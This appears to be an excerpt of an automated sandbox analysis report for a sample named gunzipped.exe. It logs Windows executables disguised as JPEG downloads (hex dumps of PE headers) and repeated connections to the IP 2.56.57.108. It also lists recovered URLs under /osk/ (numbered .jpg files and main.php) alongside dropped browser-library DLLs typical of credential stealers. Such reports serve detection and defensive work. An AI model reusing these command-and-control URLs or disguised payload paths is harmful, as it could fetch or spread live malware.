00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:20 GMTETag: "217d0-58a9fc4382400"Accept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:30 GMTETag: "6b738-58a9fc4d0ba80"Accept-Ranges: bytesContent-Length: 440120Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:30 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:44 GMTETag: "1303d0-58a9fc5a65a00"Accept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:31 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:02:02 GMTETag: "14748-58a9fc6b90280"Accept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.108

Source: gunzipped.exe, gunzipped.exe, 00000001.00000002.332350295.00000000007D7000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, gunzipped.exe, 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp	String found in binary or memory: http://2.56.57.108/osk/
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//1.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//1.jpghttp://2.56.57.108/osk//4.jpghttp://2.56.57.108/osk//7.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//2.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//2.jpghttp://2.56.57.108/osk//6.jpghttp://2.56.57.108/osk//3.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//3.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//4.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//5.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//5.jpg2
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//6.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//7.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.57.108/osk//7.jpgB
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	String found in binary or memory: http://2.56.57.108/osk//main.php
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: gunzipped.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: gunzipped.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
